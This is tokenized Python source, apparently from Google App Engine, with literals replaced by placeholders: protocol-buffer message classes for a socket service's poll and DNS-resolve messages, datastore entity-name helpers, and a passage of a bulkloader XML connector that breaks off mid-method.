getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_events ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_timeout_seconds ( d . getDouble ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . events_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_timeout_seconds_ : res += prefix + ( "<STR_LIT>" % self . DebugFormat ( self . timeout_seconds_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kevents = <NUM_LIT:1> <EOL> ktimeout_seconds = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . DOUBLE , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class PollReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> self . events_ = [ ] <EOL> if contents is not None : self . 
MergeFromString ( contents ) <EOL> def events_size ( self ) : return len ( self . events_ ) <EOL> def events_list ( self ) : return self . events_ <EOL> def events ( self , i ) : <EOL> return self . events_ [ i ] <EOL> def mutable_events ( self , i ) : <EOL> return self . events_ [ i ] <EOL> def add_events ( self ) : <EOL> x = PollEvent ( ) <EOL> self . events_ . append ( x ) <EOL> return x <EOL> def clear_events ( self ) : <EOL> self . events_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . events_size ( ) ) : self . add_events ( ) . CopyFrom ( x . events ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . events_ ) != len ( x . events_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . events_ , x . events_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . events_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . events_ ) <EOL> for i in xrange ( len ( self . events_ ) ) : n += self . lengthString ( self . events_ [ i ] . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . events_ ) <EOL> for i in xrange ( len ( self . events_ ) ) : n += self . lengthString ( self . events_ [ i ] . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_events ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . events_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . events_ [ i ] . ByteSize ( ) ) <EOL> self . events_ [ i ] . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . events_ ) ) : <EOL> out . 
putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . events_ [ i ] . ByteSizePartial ( ) ) <EOL> self . events_ [ i ] . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_events ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . events_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kevents = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ResolveRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_name_ = <NUM_LIT:0> <EOL> name_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> self . address_families_ = [ ] <EOL> if contents is not None : self . 
MergeFromString ( contents ) <EOL> def name ( self ) : return self . name_ <EOL> def set_name ( self , x ) : <EOL> self . has_name_ = <NUM_LIT:1> <EOL> self . name_ = x <EOL> def clear_name ( self ) : <EOL> if self . has_name_ : <EOL> self . has_name_ = <NUM_LIT:0> <EOL> self . name_ = "<STR_LIT>" <EOL> def has_name ( self ) : return self . has_name_ <EOL> def address_families_size ( self ) : return len ( self . address_families_ ) <EOL> def address_families_list ( self ) : return self . address_families_ <EOL> def address_families ( self , i ) : <EOL> return self . address_families_ [ i ] <EOL> def set_address_families ( self , i , x ) : <EOL> self . address_families_ [ i ] = x <EOL> def add_address_families ( self , x ) : <EOL> self . address_families_ . append ( x ) <EOL> def clear_address_families ( self ) : <EOL> self . address_families_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_name ( ) ) : self . set_name ( x . name ( ) ) <EOL> for i in xrange ( x . address_families_size ( ) ) : self . add_address_families ( x . address_families ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_name_ != x . has_name_ : return <NUM_LIT:0> <EOL> if self . has_name_ and self . name_ != x . name_ : return <NUM_LIT:0> <EOL> if len ( self . address_families_ ) != len ( x . address_families_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . address_families_ , x . address_families_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_name_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . name_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . 
address_families_ ) <EOL> for i in xrange ( len ( self . address_families_ ) ) : n += self . lengthVarInt64 ( self . address_families_ [ i ] ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_name_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . name_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . address_families_ ) <EOL> for i in xrange ( len ( self . address_families_ ) ) : n += self . lengthVarInt64 ( self . address_families_ [ i ] ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_name ( ) <EOL> self . clear_address_families ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_ ) <EOL> for i in xrange ( len ( self . address_families_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . address_families_ [ i ] ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_name_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_ ) <EOL> for i in xrange ( len ( self . address_families_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . address_families_ [ i ] ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_name ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . add_address_families ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_name_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . 
address_families_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatInt32 ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kname = <NUM_LIT:1> <EOL> kaddress_families = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:name>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ResolveReply ( ProtocolBuffer . 
ProtocolMessage ) : <EOL> SOCKET_EAI_ADDRFAMILY = <NUM_LIT:1> <EOL> SOCKET_EAI_AGAIN = <NUM_LIT:2> <EOL> SOCKET_EAI_BADFLAGS = <NUM_LIT:3> <EOL> SOCKET_EAI_FAIL = <NUM_LIT:4> <EOL> SOCKET_EAI_FAMILY = <NUM_LIT:5> <EOL> SOCKET_EAI_MEMORY = <NUM_LIT:6> <EOL> SOCKET_EAI_NODATA = <NUM_LIT:7> <EOL> SOCKET_EAI_NONAME = <NUM_LIT:8> <EOL> SOCKET_EAI_SERVICE = <NUM_LIT:9> <EOL> SOCKET_EAI_SOCKTYPE = <NUM_LIT:10> <EOL> SOCKET_EAI_SYSTEM = <NUM_LIT:11> <EOL> SOCKET_EAI_BADHINTS = <NUM_LIT:12> <EOL> SOCKET_EAI_PROTOCOL = <NUM_LIT> <EOL> SOCKET_EAI_OVERFLOW = <NUM_LIT> <EOL> SOCKET_EAI_MAX = <NUM_LIT:15> <EOL> _ErrorCode_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <EOL> <NUM_LIT:12> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:15> : "<STR_LIT>" , <EOL> } <EOL> def ErrorCode_Name ( cls , x ) : return cls . _ErrorCode_NAMES . get ( x , "<STR_LIT>" ) <EOL> ErrorCode_Name = classmethod ( ErrorCode_Name ) <EOL> has_canonical_name_ = <NUM_LIT:0> <EOL> canonical_name_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> self . packed_address_ = [ ] <EOL> self . aliases_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def packed_address_size ( self ) : return len ( self . packed_address_ ) <EOL> def packed_address_list ( self ) : return self . packed_address_ <EOL> def packed_address ( self , i ) : <EOL> return self . packed_address_ [ i ] <EOL> def set_packed_address ( self , i , x ) : <EOL> self . packed_address_ [ i ] = x <EOL> def add_packed_address ( self , x ) : <EOL> self . packed_address_ . 
append ( x ) <EOL> def clear_packed_address ( self ) : <EOL> self . packed_address_ = [ ] <EOL> def canonical_name ( self ) : return self . canonical_name_ <EOL> def set_canonical_name ( self , x ) : <EOL> self . has_canonical_name_ = <NUM_LIT:1> <EOL> self . canonical_name_ = x <EOL> def clear_canonical_name ( self ) : <EOL> if self . has_canonical_name_ : <EOL> self . has_canonical_name_ = <NUM_LIT:0> <EOL> self . canonical_name_ = "<STR_LIT>" <EOL> def has_canonical_name ( self ) : return self . has_canonical_name_ <EOL> def aliases_size ( self ) : return len ( self . aliases_ ) <EOL> def aliases_list ( self ) : return self . aliases_ <EOL> def aliases ( self , i ) : <EOL> return self . aliases_ [ i ] <EOL> def set_aliases ( self , i , x ) : <EOL> self . aliases_ [ i ] = x <EOL> def add_aliases ( self , x ) : <EOL> self . aliases_ . append ( x ) <EOL> def clear_aliases ( self ) : <EOL> self . aliases_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . packed_address_size ( ) ) : self . add_packed_address ( x . packed_address ( i ) ) <EOL> if ( x . has_canonical_name ( ) ) : self . set_canonical_name ( x . canonical_name ( ) ) <EOL> for i in xrange ( x . aliases_size ( ) ) : self . add_aliases ( x . aliases ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . packed_address_ ) != len ( x . packed_address_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . packed_address_ , x . packed_address_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_canonical_name_ != x . has_canonical_name_ : return <NUM_LIT:0> <EOL> if self . has_canonical_name_ and self . canonical_name_ != x . canonical_name_ : return <NUM_LIT:0> <EOL> if len ( self . aliases_ ) != len ( x . aliases_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . aliases_ , x . 
aliases_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . packed_address_ ) <EOL> for i in xrange ( len ( self . packed_address_ ) ) : n += self . lengthString ( len ( self . packed_address_ [ i ] ) ) <EOL> if ( self . has_canonical_name_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . canonical_name_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . aliases_ ) <EOL> for i in xrange ( len ( self . aliases_ ) ) : n += self . lengthString ( len ( self . aliases_ [ i ] ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . packed_address_ ) <EOL> for i in xrange ( len ( self . packed_address_ ) ) : n += self . lengthString ( len ( self . packed_address_ [ i ] ) ) <EOL> if ( self . has_canonical_name_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . canonical_name_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . aliases_ ) <EOL> for i in xrange ( len ( self . aliases_ ) ) : n += self . lengthString ( len ( self . aliases_ [ i ] ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_packed_address ( ) <EOL> self . clear_canonical_name ( ) <EOL> self . clear_aliases ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . packed_address_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . packed_address_ [ i ] ) <EOL> if ( self . has_canonical_name_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . canonical_name_ ) <EOL> for i in xrange ( len ( self . aliases_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . aliases_ [ i ] ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . packed_address_ ) ) : <EOL> out . 
putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . packed_address_ [ i ] ) <EOL> if ( self . has_canonical_name_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . canonical_name_ ) <EOL> for i in xrange ( len ( self . aliases_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . aliases_ [ i ] ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT> : <EOL> self . add_packed_address ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_canonical_name ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . add_aliases ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . packed_address_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatString ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_canonical_name_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . canonical_name_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . aliases_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatString ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . 
get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kpacked_address = <NUM_LIT:2> <EOL> kcanonical_name = <NUM_LIT:3> <EOL> kaliases = <NUM_LIT:4> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> } , <NUM_LIT:4> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:4> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> if _extension_runtime : <EOL> pass <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> def EntityKind ( key ) : <EOL> """<STR_LIT>""" <EOL> if key . path ( ) . element_list ( ) : <EOL> return key . path ( ) . element_list ( ) [ - <NUM_LIT:1> ] . type ( ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def EntityGroupKind ( key ) : <EOL> """<STR_LIT>""" <EOL> return key . path ( ) . element ( <NUM_LIT:0> ) . type ( ) <EOL> def EntityListKind ( keylist ) : <EOL> """<STR_LIT>""" <EOL> kinds = map ( EntityKind , keylist ) <EOL> unique_kinds = set ( kinds ) <EOL> numkinds = len ( unique_kinds ) <EOL> if numkinds > <NUM_LIT:1> : <EOL> return '<STR_LIT>' <EOL> elif numkinds == <NUM_LIT:1> : <EOL> return unique_kinds . pop ( ) <EOL> else : <EOL> return '<STR_LIT:None>' <EOL> def EntityGroupName ( entity ) : <EOL> """<STR_LIT>""" <EOL> element = entity . path ( ) . element ( <NUM_LIT:0> ) <EOL> if element . has_id ( ) : <EOL> return str ( element . id ( ) ) <EOL> elif element . has_name ( ) : <EOL> return element . name ( ) <EOL> else : <EOL> return '<STR_LIT:None>' <EOL> def EntityFullName ( entity ) : <EOL> """<STR_LIT>""" <EOL> names = [ ] <EOL> for element in entity . path ( ) . element_list ( ) : <EOL> if element . has_id ( ) : <EOL> name = '<STR_LIT>' % ( element . type ( ) , str ( element . id ( ) ) ) <EOL> elif element . has_name ( ) : <EOL> name = '<STR_LIT>' % ( element . type ( ) , str ( element . name ( ) ) ) <EOL> else : <EOL> name = '<STR_LIT>' % ( element . type ( ) ) <EOL> names . append ( name ) <EOL> fullname = '<STR_LIT:.>' . join ( names ) <EOL> return fullname </s>
<s> """<STR_LIT>""" <EOL> import codecs <EOL> import logging <EOL> import re <EOL> from xml . etree import cElementTree as ElementTree <EOL> from xml . sax import saxutils <EOL> from google . appengine . ext . bulkload import bulkloader_errors <EOL> from google . appengine . ext . bulkload import connector_interface <EOL> NODE_PATH_ONLY_RE = '<STR_LIT>' <EOL> class SimpleXmlConnector ( connector_interface . ConnectorInterface ) : <EOL> """<STR_LIT>""" <EOL> ELEMENT_CENTRIC = <NUM_LIT:1> <EOL> ATTRIBUTE_CENTRIC = <NUM_LIT:2> <EOL> @ classmethod <EOL> def create_from_options ( cls , options , name ) : <EOL> """<STR_LIT>""" <EOL> xpath_to_nodes = options . get ( '<STR_LIT>' ) <EOL> if not xpath_to_nodes : <EOL> raise bulkloader_errors . InvalidConfiguration ( <EOL> '<STR_LIT>' % <EOL> name ) <EOL> if not re . match ( NODE_PATH_ONLY_RE , xpath_to_nodes ) : <EOL> logging . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> xml_style = options . get ( '<STR_LIT>' ) <EOL> xml_style_mapping = { <EOL> '<STR_LIT>' : cls . ELEMENT_CENTRIC , <EOL> '<STR_LIT>' : cls . ATTRIBUTE_CENTRIC , <EOL> } <EOL> if xml_style not in xml_style_mapping : <EOL> raise bulkloader_errors . InvalidConfiguration ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( '<STR_LIT>' . join ( xml_style_mapping . keys ( ) ) , xml_style , <EOL> name ) ) <EOL> return cls ( xpath_to_nodes , xml_style_mapping [ xml_style ] ) <EOL> def __init__ ( self , xpath_to_nodes , xml_style ) : <EOL> """<STR_LIT>""" <EOL> self . xpath_to_nodes = xpath_to_nodes <EOL> assert xml_style in ( self . ELEMENT_CENTRIC , self . ATTRIBUTE_CENTRIC ) <EOL> self . xml_style = xml_style <EOL> self . output_stream = None <EOL> self . bulkload_state = None <EOL> self . depth = <NUM_LIT:0> <EOL> if re . match ( NODE_PATH_ONLY_RE , xpath_to_nodes ) : <EOL> self . node_list = self . xpath_to_nodes . split ( '<STR_LIT:/>' ) [ <NUM_LIT:1> : ] <EOL> self . entity_node = self . node_list [ - <NUM_LIT:1> ] <EOL> self . node_list = self . 
node_list [ : - <NUM_LIT:1> ] <EOL> else : <EOL> self . node_list = None <EOL> self . entity_node = None <EOL> self . node_list = None <EOL> def generate_import_record ( self , filename , bulkload_state ) : <EOL> """<STR_LIT>""" <EOL> self . bulkload_state = bulkload_state <EOL> tree = ElementTree . parse ( filename ) <EOL> xpath_to_nodes = self . xpath_to_nodes <EOL> if ( len ( xpath_to_nodes ) > <NUM_LIT:1> and xpath_to_nodes [ <NUM_LIT:0> ] == '<STR_LIT:/>' <EOL> and xpath_to_nodes [ <NUM_LIT:1> ] != '<STR_LIT:/>' ) : <EOL> if not tree . getroot ( ) . tag == xpath_to_nodes . split ( '<STR_LIT:/>' ) [ <NUM_LIT:1> ] : <EOL> return <EOL> xpath_to_nodes = '<STR_LIT:/>' + xpath_to_nodes . split ( '<STR_LIT:/>' , <NUM_LIT:2> ) [ <NUM_LIT:2> ] <EOL> nodes = tree . findall ( xpath_to_nodes ) <EOL> for node in nodes : <EOL> if self . xml_style == self . ELEMENT_CENTRIC : <EOL> input_dict = { } <EOL> for child in node . getchildren ( ) : <EOL> if not child . tag in input_dict : <EOL> input_dict [ child . tag ] = child . text <EOL> else : <EOL> input_dict = dict ( node . items ( ) ) <EOL> input_dict [ '<STR_LIT>' ] = node <EOL> yield input_dict <EOL> def initialize_export ( self , filename , bulkload_state ) : <EOL> """<STR_LIT>""" <EOL> self . bulkload_state = bulkload_state <EOL> if not self . node_list : <EOL> raise bulkloader_errors . InvalidConfiguration ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . output_stream = codecs . open ( filename , '<STR_LIT:wb>' , '<STR_LIT:utf-8>' ) <EOL> self . output_stream . write ( '<STR_LIT>' ) <EOL> self . depth = <NUM_LIT:0> <EOL> for node in self . node_list : <EOL> self . output_stream . write ( '<STR_LIT>' % ( '<STR_LIT:U+0020>' * self . depth , node ) ) <EOL> self . depth += <NUM_LIT:1> <EOL> self . indent = '<STR_LIT:U+0020>' * self . depth <EOL> def write_iterable_as_elements ( self , values ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( values , dict ) : <EOL> values = values . 
